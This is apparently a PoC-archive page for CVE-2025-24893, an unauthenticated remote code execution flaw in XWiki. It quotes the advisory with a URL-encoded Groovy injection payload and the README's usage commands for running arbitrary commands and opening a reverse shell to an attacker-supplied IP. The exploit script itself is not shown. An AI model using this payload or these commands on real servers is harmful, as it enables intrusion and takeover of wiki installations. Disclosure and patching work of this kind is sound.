Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-24893 PoC — Remote code execution as guest via SolrSearchMacros request in xwiki

Source
https://github.com/80Ottanta80/CVE-2025-24893-PoC
Associated Vulnerability
Title:Remote code execution as guest via SolrSearchMacros request in xwiki (CVE-2025-24893)
Description:XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit `Main.SolrSearchMacros` in `SolrSearchMacros.xml` on line 955 to match the `rawResponse` macro in `macros.vm#L2824` with a content type of `application/xml`, instead of simply outputting the content of the feed.
Description
XWiki Unauthenticated RCE Exploit for Reverse Shell
Readme
# CVE-2025-24893-PoC

XWiki Unauthenticated RCE Exploit

## Affected XWiki Versions

- Versions < 15.10.11
- Versions < 16.4.1  
- Versions < 16.5.0RC1

## Vulnerability Description

Affected XWiki versions contain a Remote Code Execution vulnerability caused by unsafe Groovy expression handling in the SolrSearch macro. Unauthenticated attackers can execute arbitrary Groovy code remotely and obtain a reverse shell.

## Proof of Concept

This exploit can be used for executing code on the target machine and can also establishes a reverse shell. Two modes are available: interactive or parameter-based. The exploit can automatically start a listener or use an existing one.


![XWiki Interactive Output](images/image1.png)

### Prerequisites

#### Attacker Machine
- Python 3
- The exploit script
- Netcat (if not using the automatic listener)

#### Target Machine
- Vulnerable XWiki version
- Network connectivity to attacker machine

### Usage

#### Interactive Mode
```bash
python3 xwiki_groovy_rce.py
```

#### Parameter Mode
```bash
# Remote Code Execution
python3 xwiki_groovy_rce.py --code "mkdir test" -u http://example.com

# Reverse Shell with automatic listener (default)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480

# Reverse Shell without existing listener (no automatic listener)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480 --no-listener
```

#### Parameters
-h/--help: Show the help menu

-u/--url: Target XWiki URL (required)

-r/--reverse-shell: Execute a reverse shell

-c/--command: Execute a single command

-i/--ip: Specify listener IP (for reverse shell only)

-p/--port: Specify listener port (for reverse shell only, default=4444)

--no-listener: Don't start a listener (for reverse shell only)

## Reference
* https://github.com/dollarboysushil/CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC/tree/main
* https://nvd.nist.gov/vuln/detail/CVE-2025-24893
* https://www.offsec.com/blog/cve-2025-24893/

## Legal Disclaimer

This proof-of-concept is for educational and authorized testing purposes only. 

Unauthorized use against systems you do not own or have explicit permission to test is illegal.

The authors are not responsible for any misuse of this information.
File Snapshot

 [4.0K]  /data/pocs/b7974396cb2675d6f9c4ff82614df5f6aa15d092
├── [4.0K]  images
│   └── [112K]  image1.png
├── [2.2K]  README.md
└── [ 14K]  xwiki_groovy_rce.py

2 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →